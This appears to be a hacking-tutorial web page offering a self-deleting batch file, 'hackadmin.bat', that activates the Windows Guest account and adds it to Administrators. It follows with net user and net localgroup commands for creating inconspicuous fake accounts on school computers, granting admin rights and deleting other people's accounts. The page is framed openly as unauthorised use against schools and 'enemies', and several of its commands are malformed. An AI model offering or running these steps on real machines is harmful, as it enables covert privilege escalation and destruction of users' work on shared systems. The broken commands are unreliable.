Hack "GUEST" with Admin privileges

Hack "GUEST" with Admin privileges........

echo off
title Please Let me hack
cls
net user add Username Password /add
net user localgroup Administrators Username /add
net user Guest 420 /active:yes
net localgroup Guests Guest /DELETE
net localgroup Administrators Guest /add
del %0



Copy this to notepad and save the file as "hackadmin.bat"
then u can double click the file to execute or run in the cmd.
it work ............................



Adding/modifying user accounts







C:>net user username /ADD

where username is the name of your new account. And remember, try and make it look inconspicuous, then they'll just think its a student who really is at school, when really, the person doesn't EXIST! IF you wanna have a password, use this instead:

C:>net user username password /ADD

where password is the password you want to have. So for instance the above would create an account called 'username', with the password being 'password'. The below would have a username of 'deoffuscated' and a password of 'root123'

C:>net user deoffuscated root123 /ADD

Right then, now that we can create accounts, let's delete them:)

C:>net user deoffuscated /DELETE

This will delete poor liddle deoffuscatd account. Do it to you enemies  no only joking becuase they could have important work... well okay only if you REALLY hate them
Let's give you admin priveleges:)

C:>net localgroup administrator newadmin /ADD

This will make newadmin an admin. Remember that some schools may not call their admins 'adminstrator' and so you need to find out the name of the local group they belong to.

You can list all the localgroups by typing

C:>net localgroup


jack sparrow

01010100000000001011111111111101010101010101000000000000101001010

 

Copyright 2018 Deoffuscated.

Designed by &deoffuscated